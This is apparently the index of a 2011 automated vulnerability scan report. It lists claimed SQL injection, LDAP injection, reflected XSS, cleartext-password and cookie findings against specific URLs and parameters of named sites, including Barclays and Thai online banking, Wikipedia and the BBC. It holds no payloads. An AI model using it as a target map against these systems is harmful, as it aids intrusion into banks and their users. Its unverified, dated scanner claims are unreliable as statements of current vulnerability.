XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 05032011-03

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Tue May 03 19:48:49 CDT 2011.


Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

Loading

1. SQL injection

1.1. http://group.barclays.com/assets/script/webtrends-del.js [REST URL parameter 1]

1.2. http://group.barclays.com/html_phase_2/assets/css/styles.min.css [REST URL parameter 2]

1.3. http://group.barclays.com/html_phase_2/assets/scripts/scripts.min.js [REST URL parameter 2]

1.4. http://html.aggregateknowledge.com/iframe [itemid parameter]

1.5. https://ibank.barclays.co.uk/olb/w/IndividualSavingsAcctOverview.do [JSESSIONID cookie]

1.6. http://moneytalk.scb.co.th/index.asp [Referer HTTP header]

1.7. http://moneytalk.scb.co.th/index.asp [name of an arbitrarily supplied request parameter]

1.8. http://register2.set.or.th/semreg/detail.aspx [cs parameter]

1.9. http://register2.set.or.th/semreg/detail.aspx [ow parameter]

1.10. http://register2.set.or.th/semreg/detail.aspx [sn parameter]

1.11. http://www.360travelguide.com/results.asp [User-Agent HTTP header]

1.12. http://www.bangkokbank.com/Online%20Banking/For%20Personal/iBanking/Pages/Forms/AllItems.aspx [REST URL parameter 3]

1.13. http://www.bangkokbank.com/_layouts/NR/JavaScript/truehitsstat.asp [REST URL parameter 4]

1.14. http://www.scriptlogic.com/ [Referer HTTP header]

1.15. http://www.set.or.th/set/images/bg-body.gif [jsessionid parameter]

2. LDAP injection

2.1. https://ibank.barclays.co.uk/olb/w/IndividualSavingsAcctOverview.do [WLBC cookie]

2.2. https://ibank.barclays.co.uk/olb/w/LoanOverview.do [WLBC cookie]

2.3. https://ibank.barclays.co.uk/olb/w/ReorderPasscodeStandalone.do [WLBC cookie]

2.4. https://ibank.barclays.co.uk/olb/w/ViewEStatementHistoryStep1.do [WLBC cookie]

3. XPath injection

4. HTTP header injection

4.1. http://18.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter]

4.2. http://ad.uk.doubleclick.net/activity [REST URL parameter 1]

4.3. http://topics.nytimes.com/top/news/business/ [REST URL parameter 2]

4.4. http://topics.nytimes.com/top/news/business/ [REST URL parameter 3]

5. Cross-site scripting (reflected)

5.1. http://api.bing.com/qsonhs.aspx [q parameter]

5.2. http://bits.wikimedia.org/en.wikipedia.org/load.php [REST URL parameter 2]

5.3. http://bits.wikimedia.org/en.wikipedia.org/load.php [REST URL parameter 2]

5.4. http://de.wikipedia.org/wiki/Liste_der_Banken_in_Thailand [REST URL parameter 2]

5.5. http://de.wikipedia.org/wiki/Liste_der_Banken_in_Thailand [REST URL parameter 2]

5.6. http://ds.addthis.com/red/psi/sites/marketdata.set.or.th/p.json [callback parameter]

5.7. http://ds.addthis.com/red/psi/sites/www.set.or.th/p.json [callback parameter]

5.8. http://edge.aperture.displaymarketplace.com/displayscript.js [PageID parameter]

5.9. http://en.wikipedia.org/w/index.php [REST URL parameter 1]

5.10. http://en.wikipedia.org/w/index.php [REST URL parameter 2]

5.11. http://en.wikipedia.org/w/index.php [REST URL parameter 2]

5.12. http://en.wikipedia.org/wiki/List_of_banks_in_Thailand [REST URL parameter 2]

5.13. http://en.wikipedia.org/wiki/List_of_banks_in_Thailand [REST URL parameter 2]

5.14. http://hits.truehits.in.th/data/a0000000.js [REST URL parameter 1]

5.15. http://hits.truehits.in.th/data/a0000000.js [REST URL parameter 2]

5.16. http://hits.truehits.in.th/data/c0002215.js [REST URL parameter 1]

5.17. http://hits.truehits.in.th/data/c0002215.js [REST URL parameter 2]

5.18. http://hits.truehits.in.th/data/f0010172.js [REST URL parameter 1]

5.19. http://hits.truehits.in.th/data/f0010172.js [REST URL parameter 2]

5.20. http://hits.truehits.in.th/data/k0019767.js [REST URL parameter 1]

5.21. http://hits.truehits.in.th/data/k0019767.js [REST URL parameter 2]

5.22. http://hits.truehits.in.th/data/q0027704.js [REST URL parameter 1]

5.23. http://hits.truehits.in.th/data/q0027704.js [REST URL parameter 2]

5.24. http://hits.truehits.in.th/data/s0028564.js [REST URL parameter 1]

5.25. http://hits.truehits.in.th/data/s0028564.js [REST URL parameter 2]

5.26. http://html.aggregateknowledge.com/iframe [pid parameter]

5.27. http://marketdata.set.or.th/mkt/topten.do [country parameter]

5.28. http://marketdata.set.or.th/mkt/topten.do [language parameter]

5.29. http://meta.wikimedia.org/w/index.php [REST URL parameter 2]

5.30. http://meta.wikimedia.org/w/index.php [REST URL parameter 2]

5.31. http://meta.wikimedia.org/w/index.php [name of an arbitrarily supplied request parameter]

5.32. http://meta.wikimedia.org/w/index.php [name of an arbitrarily supplied request parameter]

5.33. http://meta.wikimedia.org/wiki/List_of_Wikipedias [REST URL parameter 2]

5.34. http://meta.wikimedia.org/wiki/List_of_Wikipedias [REST URL parameter 2]

5.35. http://news.bbc.co.uk/earth/hi/earth_news/newsid_9469000/9469456.stm [name of an arbitrarily supplied request parameter]

5.36. http://news.bbc.co.uk/go/rss/int/news/-/earth/hi/earth_news/newsid_9469000/9469456.stm [name of an arbitrarily supplied request parameter]

5.37. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/cricket/13264093.stm [name of an arbitrarily supplied request parameter]

5.38. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/football/13265403.stm [name of an arbitrarily supplied request parameter]

5.39. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/formula_one/13267766.stm [name of an arbitrarily supplied request parameter]

5.40. http://news.bbc.co.uk/sport2/hi/cricket/13264093.stm [name of an arbitrarily supplied request parameter]

5.41. http://news.bbc.co.uk/sport2/hi/football/13265403.stm [name of an arbitrarily supplied request parameter]

5.42. http://news.bbc.co.uk/sport2/hi/formula_one/13267766.stm [name of an arbitrarily supplied request parameter]

5.43. http://rtradeinfo.bualuang.co.th/tradinginfo.services/price_update.php [lang parameter]

5.44. http://rtradeinfo.bualuang.co.th/tradinginfo.services/price_update.php [name of an arbitrarily supplied request parameter]

5.45. http://trends.atipat.co.cc/thailand-breast-slap/x22 [REST URL parameter 1]

5.46. http://trends.atipat.co.cc/thailand-breast-slap/x22 [REST URL parameter 2]

5.47. http://trends.atipat.co.cc/thailand-breast-slap/x22 [name of an arbitrarily supplied request parameter]

5.48. http://widgets.digg.com/buttons/count [url parameter]

5.49. http://wiki.answers.com/Q/Who_is_Director_of_Barkley_Bank_London [REST URL parameter 1]

5.50. http://wiki.answers.com/Q/Who_is_Director_of_Barkley_Bank_London [REST URL parameter 2]

5.51. http://wiki.answers.com/Q/Who_is_Director_of_Barkley_Bank_London [name of an arbitrarily supplied request parameter]

5.52. http://wikimediafoundation.org/wiki/Privacy_policy [REST URL parameter 2]

5.53. http://wikimediafoundation.org/wiki/Privacy_policy [REST URL parameter 2]

5.54. http://wikimediafoundation.org/wiki/Special:Landingcheck [REST URL parameter 2]

5.55. http://wikimediafoundation.org/wiki/Special:Landingcheck [REST URL parameter 2]

5.56. http://wikimediafoundation.org/wiki/Terms_of_Use [REST URL parameter 2]

5.57. http://wikimediafoundation.org/wiki/Terms_of_Use [REST URL parameter 2]

5.58. http://www.bangkokbank.com/_layouts/NR/JavaScript/truehitsstat.asp [pagename parameter]

5.59. http://www.bangkokpost.com/business/company-in-thailand/financial/banking/search/x26amp [REST URL parameter 2]

5.60. http://www.bangkokpost.com/business/company-in-thailand/financial/banking/search/x26amp [REST URL parameter 2]

5.61. http://www.bangkokpost.com/business/company-in-thailand/financial/banking/search/x26amp [REST URL parameter 3]

5.62. http://www.bangkokpost.com/business/company-in-thailand/financial/banking/search/x26amp [REST URL parameter 3]

5.63. http://www.bangkokpost.com/business/company-in-thailand/financial/banking/search/x26amp [REST URL parameter 4]

5.64. http://www.bangkokpost.com/business/company-in-thailand/financial/banking/search/x26amp [REST URL parameter 4]

5.65. http://www.bangkokpost.com/business/company-in-thailand/financial/banking/search/x26amp [REST URL parameter 5]

5.66. http://www.bangkokpost.com/business/company-in-thailand/financial/banking/search/x26amp [REST URL parameter 6]

5.67. http://www.bangkokpost.com/business/company-in-thailand/financial/banking/search/x26amp [REST URL parameter 6]

5.68. http://www.bangkokpost.com/business/company-in-thailand/financial/search/x26amp [REST URL parameter 2]

5.69. http://www.bangkokpost.com/business/company-in-thailand/financial/search/x26amp [REST URL parameter 2]

5.70. http://www.bangkokpost.com/business/company-in-thailand/financial/search/x26amp [REST URL parameter 3]

5.71. http://www.bangkokpost.com/business/company-in-thailand/financial/search/x26amp [REST URL parameter 3]

5.72. http://www.bangkokpost.com/business/company-in-thailand/financial/search/x26amp [REST URL parameter 4]

5.73. http://www.bangkokpost.com/business/company-in-thailand/financial/search/x26amp [REST URL parameter 5]

5.74. http://www.bangkokpost.com/business/company-in-thailand/financial/search/x26amp [REST URL parameter 5]

5.75. http://www.bangkokpost.com/forum/viewtopic.php [name of an arbitrarily supplied request parameter]

5.76. http://www.google.com/advanced_search [name of an arbitrarily supplied request parameter]

5.77. http://www.ktam.co.th/en/alliance.php [name of an arbitrarily supplied request parameter]

5.78. http://www.ktam.co.th/en/index.php [name of an arbitrarily supplied request parameter]

5.79. http://www.ktam.co.th/en/index.php/a [REST URL parameter 3]

5.80. http://www.ktam.co.th/en/index.php/declarationnav.php [REST URL parameter 3]

5.81. http://www.ktam.co.th/en/index.php/declarationnav.php [name of an arbitrarily supplied request parameter]

5.82. http://www.ktam.co.th/en/index.php/ims/ads_csi300_2.gif [REST URL parameter 4]

5.83. http://www.ktam.co.th/en/index.php/ims/b_ktam_news11.gif [REST URL parameter 4]

5.84. http://www.ktam.co.th/en/index.php/ims/b_ktam_news12.gif [REST URL parameter 4]

5.85. http://www.ktam.co.th/en/index.php/ims/b_ktam_news13.gif [REST URL parameter 4]

5.86. http://www.ktam.co.th/en/index.php/ims/b_ktam_news21.gif [REST URL parameter 4]

5.87. http://www.ktam.co.th/en/index.php/ims/b_ktam_news22.gif [REST URL parameter 4]

5.88. http://www.ktam.co.th/en/index.php/ims/b_ktam_news23.gif [REST URL parameter 4]

5.89. http://www.ktam.co.th/en/index.php/ims/b_nav11.gif [REST URL parameter 4]

5.90. http://www.ktam.co.th/en/index.php/ims/b_nav12.gif [REST URL parameter 4]

5.91. http://www.ktam.co.th/en/index.php/ims/b_nav13.gif [REST URL parameter 4]

5.92. http://www.ktam.co.th/en/index.php/ims/b_nav21.gif [REST URL parameter 4]

5.93. http://www.ktam.co.th/en/index.php/ims/b_nav22.gif [REST URL parameter 4]

5.94. http://www.ktam.co.th/en/index.php/ims/b_nav23.gif [REST URL parameter 4]

5.95. http://www.ktam.co.th/en/index.php/ims/bg_cr1.gif [REST URL parameter 4]

5.96. http://www.ktam.co.th/en/index.php/ims/bg_head1.gif [REST URL parameter 4]

5.97. http://www.ktam.co.th/en/index.php/ims/bg_mmenu01.gif [REST URL parameter 4]

5.98. http://www.ktam.co.th/en/index.php/ims/bg_mmenu02.gif [REST URL parameter 4]

5.99. http://www.ktam.co.th/en/index.php/ims/bg_search1.gif [REST URL parameter 4]

5.100. http://www.ktam.co.th/en/index.php/ims/bt_about1.gif [REST URL parameter 4]

5.101. http://www.ktam.co.th/en/index.php/ims/bt_agent1.gif [REST URL parameter 4]

5.102. http://www.ktam.co.th/en/index.php/ims/bt_education_center1.gif [REST URL parameter 4]

5.103. http://www.ktam.co.th/en/index.php/ims/bt_home2.gif [REST URL parameter 4]

5.104. http://www.ktam.co.th/en/index.php/ims/bt_news1.gif [REST URL parameter 4]

5.105. http://www.ktam.co.th/en/index.php/ims/bt_service1.gif [REST URL parameter 4]

5.106. http://www.ktam.co.th/en/index.php/ims/cmd_search1.gif [REST URL parameter 4]

5.107. http://www.ktam.co.th/en/index.php/ims/empty.gif [REST URL parameter 4]

5.108. http://www.ktam.co.th/en/index.php/ims/h_download1.gif [REST URL parameter 4]

5.109. http://www.ktam.co.th/en/index.php/ims/h_link1.gif [REST URL parameter 4]

5.110. http://www.ktam.co.th/en/index.php/ims/i_acrobat.gif [REST URL parameter 4]

5.111. http://www.ktam.co.th/en/index.php/ims/i_firefox.gif [REST URL parameter 4]

5.112. http://www.ktam.co.th/en/index.php/ims/i_flash.gif [REST URL parameter 4]

5.113. http://www.ktam.co.th/en/index.php/ims/i_winmedia.gif [REST URL parameter 4]

5.114. http://www.ktam.co.th/en/index.php/ims/mails.png [REST URL parameter 4]

5.115. http://www.ktam.co.th/en/index.php/ims/news.php [REST URL parameter 4]

5.116. http://www.ktam.co.th/en/index.php/ims/news.php [name of an arbitrarily supplied request parameter]

5.117. http://www.ktam.co.th/en/index.php/ims/p_flag_th.gif [REST URL parameter 4]

5.118. http://www.ktam.co.th/en/index.php/ims/p_ktamnew.gif [REST URL parameter 4]

5.119. http://www.ktam.co.th/en/index.php/ims/p_ktamonline.gif [REST URL parameter 4]

5.120. http://www.ktam.co.th/en/index.php/ims/p_line001.gif [REST URL parameter 4]

5.121. http://www.ktam.co.th/en/index.php/ims/p_line002.gif [REST URL parameter 4]

5.122. http://www.ktam.co.th/en/index.php/ims/p_link01.gif [REST URL parameter 4]

5.123. http://www.ktam.co.th/en/index.php/ims/p_link02.gif [REST URL parameter 4]

5.124. http://www.ktam.co.th/en/index.php/ims/p_link03.gif [REST URL parameter 4]

5.125. http://www.ktam.co.th/en/index.php/ims/p_link04.gif [REST URL parameter 4]

5.126. http://www.ktam.co.th/en/index.php/ims/p_link05.gif [REST URL parameter 4]

5.127. http://www.ktam.co.th/en/index.php/ims/p_link06.gif [REST URL parameter 4]

5.128. http://www.ktam.co.th/en/index.php/ims/p_logo1.gif [REST URL parameter 4]

5.129. http://www.ktam.co.th/en/index.php/ims/p_word1.gif [REST URL parameter 4]

5.130. http://www.ktam.co.th/en/index.php/media_box.php [REST URL parameter 3]

5.131. http://www.ktam.co.th/en/index.php/media_box.php [name of an arbitrarily supplied request parameter]

5.132. http://www.ktam.co.th/en/index.php/news.inc.php [REST URL parameter 3]

5.133. http://www.ktam.co.th/en/index.php/news.inc.php [name of an arbitrarily supplied request parameter]

5.134. http://www.ktam.co.th/en/index.php/news.php [REST URL parameter 3]

5.135. http://www.ktam.co.th/en/index.php/news.php [name of an arbitrarily supplied request parameter]

5.136. http://www.ktam.co.th/en/index.php/self_discovery.php [REST URL parameter 3]

5.137. http://www.ktam.co.th/en/index.php/self_discovery.php [name of an arbitrarily supplied request parameter]

5.138. http://www.ktam.co.th/en/index.php/style/news.php [REST URL parameter 4]

5.139. http://www.ktam.co.th/en/index.php/style/news.php [name of an arbitrarily supplied request parameter]

5.140. http://www.ktam.co.th/en/index.php/style/page.txt [REST URL parameter 4]

5.141. http://www.scb.co.th/en/home [REST URL parameter 1]

5.142. http://www.scb.co.th/en/home [REST URL parameter 2]

5.143. http://www.scb.co.th/en/home/ [REST URL parameter 1]

5.144. http://www.scb.co.th/en/home/ [REST URL parameter 2]

5.145. http://www.scb.co.th/en/home/favicon.ico [REST URL parameter 1]

5.146. http://www.scb.co.th/en/home/favicon.ico [REST URL parameter 2]

5.147. http://www.scb.co.th/en/home/favicon.ico [REST URL parameter 3]

5.148. http://www.scb.co.th/en/home/favicon.ico [name of an arbitrarily supplied request parameter]

5.149. http://www.scb.co.th/favicon.ico [REST URL parameter 1]

5.150. http://www.scb.co.th/landing.html [REST URL parameter 1]

5.151. http://www.scb.co.th/scb_api/img/api/t1new/bttn_calc.gif [REST URL parameter 1]

5.152. http://www.scb.co.th/scb_api/img/api/t1new/bttn_reset.gif [REST URL parameter 1]

5.153. http://www.scb.co.th/scb_api/scbapi.jsp [REST URL parameter 1]

5.154. http://www.scb.co.th/stocks/media/00107f.swf [REST URL parameter 1]

5.155. http://www.scb.co.th/stocks/media/00107f.swf [REST URL parameter 2]

5.156. http://www.scb.co.th/stocks/media/00107f.swf [REST URL parameter 3]

5.157. http://news.bbc.co.uk/earth/hi/earth_news/newsid_9469000/9469456.stm [Referer HTTP header]

5.158. http://news.bbc.co.uk/go/rss/int/news/-/earth/hi/earth_news/newsid_9469000/9469456.stm [Referer HTTP header]

5.159. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/cricket/13264093.stm [Referer HTTP header]

5.160. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/football/13265403.stm [Referer HTTP header]

5.161. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/formula_one/13267766.stm [Referer HTTP header]

5.162. http://news.bbc.co.uk/sport2/hi/cricket/13264093.stm [Referer HTTP header]

5.163. http://news.bbc.co.uk/sport2/hi/football/13265403.stm [Referer HTTP header]

5.164. http://news.bbc.co.uk/sport2/hi/formula_one/13267766.stm [Referer HTTP header]

5.165. http://scb.dev-orisma.com/en/friends-of-scb [User-Agent HTTP header]

5.166. http://www.scb.co.th/en/home [User-Agent HTTP header]

5.167. http://www.scb.co.th/en/home/ [User-Agent HTTP header]

5.168. http://dl.scriptlogic.com/download/default.aspx [EntryPoint cookie]

5.169. http://dl.scriptlogic.com/login/Combined.aspx [EntryPoint cookie]

5.170. http://dl.scriptlogic.com/login/CombinedRegister.aspx [EntryPoint cookie]

5.171. http://seg.sharethis.com/getSegment.php [__stid cookie]

5.172. http://www.scriptlogic.com/downloadmanager/default.aspx [focus parameter]

6. Flash cross-domain policy

6.1. http://18.xg4ken.com/crossdomain.xml

6.2. http://a.unanimis.co.uk/crossdomain.xml

6.3. http://ad.doubleclick.net/crossdomain.xml

6.4. http://ad.uk.doubleclick.net/crossdomain.xml

6.5. http://adfarm.mediaplex.com/crossdomain.xml

6.6. http://aperture.displaymarketplace.com/crossdomain.xml

6.7. http://b.scorecardresearch.com/crossdomain.xml

6.8. http://cspix.media6degrees.com/crossdomain.xml

6.9. http://dis.us.criteo.com/crossdomain.xml

6.10. http://edge.aperture.displaymarketplace.com/crossdomain.xml

6.11. http://g.msn.com/crossdomain.xml

6.12. http://in.getclicky.com/crossdomain.xml

6.13. http://metrics.seenon.com/crossdomain.xml

6.14. http://now.eloqua.com/crossdomain.xml

6.15. http://pixel.33across.com/crossdomain.xml

6.16. http://scriptlogiccorp.d2.sc.omtrdc.net/crossdomain.xml

6.17. http://statse.webtrendslive.com/crossdomain.xml

6.18. http://tc.barclays.co.uk/crossdomain.xml

6.19. http://www.1day1year.com/crossdomain.xml

6.20. http://www.bangkokpost.com/crossdomain.xml

6.21. http://www.newsroom.barclays.com/crossdomain.xml

6.22. https://adwords.google.com/crossdomain.xml

6.23. http://answers.yahoo.com/crossdomain.xml

6.24. http://api.bing.com/crossdomain.xml

6.25. http://apps.barclays.co.uk/crossdomain.xml

6.26. https://apps.barclays.co.uk/crossdomain.xml

6.27. http://edge.sharethis.com/crossdomain.xml

6.28. http://feeds.bbci.co.uk/crossdomain.xml

6.29. http://googleads.g.doubleclick.net/crossdomain.xml

6.30. http://ktbcare.hi5.com/crossdomain.xml

6.31. http://news.bbc.co.uk/crossdomain.xml

6.32. http://newsrss.bbc.co.uk/crossdomain.xml

6.33. http://online.wsj.com/crossdomain.xml

6.34. http://pagead2.googlesyndication.com/crossdomain.xml

6.35. http://picasaweb.google.com/crossdomain.xml

6.36. http://topics.nytimes.com/crossdomain.xml

6.37. http://video.google.com/crossdomain.xml

6.38. http://w.sharethis.com/crossdomain.xml

6.39. http://www.adobe.com/crossdomain.xml

6.40. http://www.barclays.co.uk/crossdomain.xml

6.41. http://www.facebook.com/crossdomain.xml

6.42. http://www.independent.co.uk/crossdomain.xml

6.43. http://www.nbcuniversalstore.com/crossdomain.xml

6.44. http://www.youtube.com/crossdomain.xml

6.45. http://admin7.testandtarget.omniture.com/crossdomain.xml

6.46. http://advertising.microsoft.com/crossdomain.xml

6.47. http://docs.google.com/crossdomain.xml

6.48. http://twitter.com/crossdomain.xml

6.49. http://v13.lscache4.googlevideo.com/crossdomain.xml

6.50. http://weblink.settrade.com/crossdomain.xml

7. Silverlight cross-domain policy

7.1. http://ad.doubleclick.net/clientaccesspolicy.xml

7.2. http://ad.uk.doubleclick.net/clientaccesspolicy.xml

7.3. http://b.scorecardresearch.com/clientaccesspolicy.xml

7.4. http://g.msn.com/clientaccesspolicy.xml

7.5. http://metrics.seenon.com/clientaccesspolicy.xml

7.6. http://pixel.33across.com/clientaccesspolicy.xml

7.7. http://scriptlogiccorp.d2.sc.omtrdc.net/clientaccesspolicy.xml

7.8. http://api.bing.com/clientaccesspolicy.xml

7.9. http://onlinehelp.microsoft.com/clientaccesspolicy.xml

8. Cleartext submission of password

8.1. http://dl.scriptlogic.com/login/Combined.aspx

8.2. http://home.controlcase.com/piwik/

8.3. http://online.wsj.com/article/BT-CO-20110428-705019.html/x22

8.4. http://truehits.net/

8.5. http://truehits.net/stat.php

8.6. http://wiki.answers.com/Q/Who_is_Director_of_Barkley_Bank_London

8.7. http://wiki.answers.com/Q/Who_is_Director_of_Barkley_Bank_London

8.8. http://wikipediareview.com/index.php

8.9. http://www.controlcase.com/change_password.php

8.10. http://www.controlcase.com/logon_page.php

8.11. http://www.khonkaen.com/english/forum/default.asp

8.12. http://www.newsroom.barclays.com/webuser/newsextra.aspx

8.13. http://www.newsroom.barclays.com/webuser/register.aspx

8.14. http://www.thailandhotelforums.com/forum/index.php

8.15. http://www.thailandhotelforums.com/forum/index.php

8.16. http://www.yestheyrefake.net/vb/forumdisplay.php

8.17. http://www.yestheyrefake.net/vb/showthread.php

9. XML injection

9.1. http://get.adobe.com/flashplayer/ [REST URL parameter 1]

9.2. http://home.controlcase.com/piwik/ [REST URL parameter 1]

9.3. http://home.controlcase.com/piwik/piwik.js [REST URL parameter 1]

9.4. http://home.controlcase.com/piwik/piwik.js [REST URL parameter 2]

9.5. http://home.controlcase.com/piwik/piwik.php [REST URL parameter 1]

9.6. http://home.controlcase.com/piwik/piwik.php [REST URL parameter 2]

9.7. https://home.controlcase.com/piwik/ [REST URL parameter 1]

9.8. http://lvs.truehits.in.th/func/th_common_1.4.js [REST URL parameter 1]

9.9. http://lvs.truehits.in.th/func/th_common_1.4.js [REST URL parameter 2]

9.10. http://lvs.truehits.in.th/func/th_donate_1.8.js [REST URL parameter 1]

9.11. http://lvs.truehits.in.th/func/th_donate_1.8.js [REST URL parameter 2]

9.12. http://translatewiki.net/wiki/MediaWiki:Collapsible-collapse/en [REST URL parameter 1]

9.13. http://translatewiki.net/wiki/MediaWiki:Collapsible-expand/en [REST URL parameter 1]

9.14. http://www.controlcase.com/favicon.ico [REST URL parameter 1]

10. SQL statement in request parameter

11. SSL cookie without secure flag set

11.1. https://bizibanking.bangkokbank.com/bblamsui/SignOn.aspx

11.2. https://icustody.bangkokbank.com/Signon.aspx

11.3. https://ifunds.bangkokbank.com/Login.aspx

11.4. https://kcustodian.kasikornbank.com/KCustodian/

11.5. https://letmechoose.barclays.co.uk/

11.6. https://online.kasikornbankgroup.com/K-Online/ib/login_en.jsp

11.7. https://online.kasikornbankgroup.com/K-Online/ksec/K-CyberTrade-login.jsp

11.8. https://www.barclaysfantasyfundmanager.co.uk/

11.9. https://www.bizpayment.ktb.co.th/epayview/

11.10. https://www.ktamsmarttrade.com/FrontWeb/Home/Login.aspx

11.11. https://www.ktb.co.th/internetservice/onlineAccountAction.do

11.12. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser/download

11.13. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser/information

11.14. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser/logon_th

11.15. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser/securetip

11.16. https://adwords.google.com/um/StartNewLogin

11.17. https://dimenxion.bangkokbank.com/bonprd/jsp/common/loginfiles/es.jsp

11.18. https://ebank.kasikornbankgroup.com/kbiznet/login.html

11.19. https://feedback.live.com/default.aspx

11.20. https://ibank.barclays.co.uk/

11.21. https://www.bizpayment.ktb.co.th/epayview

11.22. https://www.newcb.ktb.co.th/

11.23. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser

12. Session token in URL

12.1. http://l.sharethis.com/pview

12.2. http://marketdata.set.or.th/mkt/images/bg-body.gif

12.3. http://marketdata.set.or.th/mkt/images/button-orange.gif

12.4. http://marketdata.set.or.th/mkt/images/email-setcallcenter.gif

12.5. http://marketdata.set.or.th/mkt/images/icon-go.gif

12.6. http://marketdata.set.or.th/mkt/images/icon-print-en01.gif

12.7. http://marketdata.set.or.th/mkt/images/icon-thai01.gif

12.8. http://marketdata.set.or.th/mkt/images/leftbox-top.gif

12.9. http://marketdata.set.or.th/mkt/images/middlebox-bgtop.gif

12.10. http://marketdata.set.or.th/mkt/images/middlebox-bottom-bg.gif

12.11. http://marketdata.set.or.th/mkt/images/middlebox-bottomleft.gif

12.12. http://marketdata.set.or.th/mkt/images/middlebox-bottomright.gif

12.13. http://marketdata.set.or.th/mkt/images/middlebox-topleft.gif

12.14. http://marketdata.set.or.th/mkt/images/middlebox-topright.gif

12.15. http://marketdata.set.or.th/mkt/images/rightbox-top.gif

12.16. http://marketdata.set.or.th/mkt/images/rss.gif

12.17. http://marketdata.set.or.th/mkt/images/spacer.gif

12.18. http://marketdata.set.or.th/mkt/images/tab-blue-bg.gif

12.19. http://marketdata.set.or.th/mkt/images/tab-blue-left.gif

12.20. http://marketdata.set.or.th/mkt/images/tab-blue-right.gif

12.21. http://marketdata.set.or.th/mkt/images/tab-grey-bg.gif

12.22. http://marketdata.set.or.th/mkt/images/tab-grey-left.gif

12.23. http://marketdata.set.or.th/mkt/images/tab-grey-right.gif

12.24. http://marketdata.set.or.th/mkt/javascripts/javascript.js

12.25. http://marketdata.set.or.th/mkt/styles/setstyle.css

12.26. http://marketdata.set.or.th/mkt/topten.do

12.27. http://marketdata.set.or.th/static/market/set/indextab_en_US.html

12.28. http://www.facebook.com/extern/login_status.php

12.29. http://www.set.or.th/highlight/release_en_US.html

12.30. http://www.set.or.th/set/images/bg-body.gif

12.31. http://www.set.or.th/set/images/button-orange.gif

12.32. http://www.set.or.th/set/images/email-setcallcenter.gif

12.33. http://www.set.or.th/set/images/icon-Avi.gif

12.34. http://www.set.or.th/set/images/icon-print-en01.gif

12.35. http://www.set.or.th/set/images/icon-thai01.gif

12.36. http://www.set.or.th/set/images/leftbox-top.gif

12.37. http://www.set.or.th/set/images/middlebox-bgtop.gif

12.38. http://www.set.or.th/set/images/middlebox-bottom-bg.gif

12.39. http://www.set.or.th/set/images/middlebox-bottomleft.gif

12.40. http://www.set.or.th/set/images/middlebox-bottomright.gif

12.41. http://www.set.or.th/set/images/middlebox-topleft.gif

12.42. http://www.set.or.th/set/images/middlebox-topright.gif

12.43. http://www.set.or.th/set/images/rightbox-top.gif

12.44. http://www.set.or.th/set/images/rss.gif

12.45. http://www.set.or.th/set/images/spacer.gif

12.46. http://www.set.or.th/set/javascripts/javascript.js

12.47. http://www.set.or.th/set/oppdaybyperiod.do

12.48. http://www.set.or.th/set/styles/setstyle.css

12.49. http://www.set.or.th/static/news/latestnews_en_US.html

12.50. http://www.set.or.th/static/news/latestnews_th_TH.html

12.51. http://www.thailandhotelforums.com/forum/index.php

13. SSL certificate

13.1. https://eprocurement.ktb.co.th/

13.2. https://feedback.live.com/

13.3. https://home.controlcase.com/

13.4. https://adwords.google.com/

13.5. https://apps.barclays.co.uk/

13.6. https://center.ktam.co.th/

13.7. https://csc.scb.co.th/

13.8. https://ebank.kasikornbankgroup.com/

13.9. https://ibank.barclays.co.uk/

13.10. https://ibanking.bangkokbank.com/

13.11. https://ipay.bangkokbank.com/

13.12. https://k-invest.kasikornbankgroup.com/

13.13. https://kcustodian.kasikornbank.com/

13.14. https://ksupplychain.kasikornbank.com/

13.15. https://ktradeconnect.kasikornbank.com/

13.16. https://letmechoose.barclays.co.uk/

13.17. https://online.kasikornbankgroup.com/

13.18. https://secure.wikimedia.org/

13.19. https://ws10.kasikornbank.com/

13.20. https://www.barclays-home-insurance.co.uk/

13.21. https://www.barclaysfantasyfundmanager.co.uk/

13.22. https://www.bizpayment.ktb.co.th/

13.23. https://www.google.com/

13.24. https://www.ktamsmarttrade.com/

13.25. https://www.ktb.co.th/

13.26. https://www.ktbonline.ktb.co.th/

13.27. https://www.newcb.ktb.co.th/

13.28. https://www.scb-fx.com/

13.29. https://www.scbbusinessnet.com/

13.30. https://www.scbeasy.com/

14. Open redirection

15. Cookie scoped to parent domain

15.1. http://online.wsj.com/article/BT-CO-20110428-705019.html/x22

15.2. http://www.thailandhotelforums.com/forum/index.php

15.3. http://0.r.msn.com/

15.4. http://18.xg4ken.com/media/redir.php

15.5. http://318395.r.msn.com/

15.6. http://914188.r.msn.com/

15.7. http://a.unanimis.co.uk/fc.php

15.8. https://adwords.google.com/select/Login

15.9. https://adwords.google.com/um/StartNewLogin

15.10. http://answers.yahoo.com/dir/index

15.11. http://answers.yahoo.com/question/index

15.12. http://b.scorecardresearch.com/b

15.13. http://cspix.media6degrees.com/orbserv/hbpix

15.14. http://dis.us.criteo.com/dis/dis.aspx

15.15. http://ds.addthis.com/red/psi/sites/www.set.or.th/p.json

15.16. http://edge.aperture.displaymarketplace.com/displayscript.js

15.17. http://get.adobe.com/flashplayer/

15.18. http://html.aggregateknowledge.com/iframe

15.19. http://id.google.com/verify/EAAAACvp35bQYF1JBTLact6hVgw.gif

15.20. http://id.google.com/verify/EAAAAGtz_EH3k7Yc1hyVHgvxIEg.gif

15.21. http://leadback.advertising.com/adcedge/lb

15.22. http://m1645.ic-live.com/515/

15.23. http://metrics.seenon.com/b/ss/delagentnbc,delagentglobalrollup/1/H.17/s25651625484430

15.24. http://news.bbc.co.uk/2/hi/help/rss/4498287.stm

15.25. http://news.bbc.co.uk/earth/hi/earth_news/newsid_9469000/9469456.stm

15.26. http://news.bbc.co.uk/go/rss/int/news/-/earth/hi/earth_news/newsid_9469000/9469456.stm

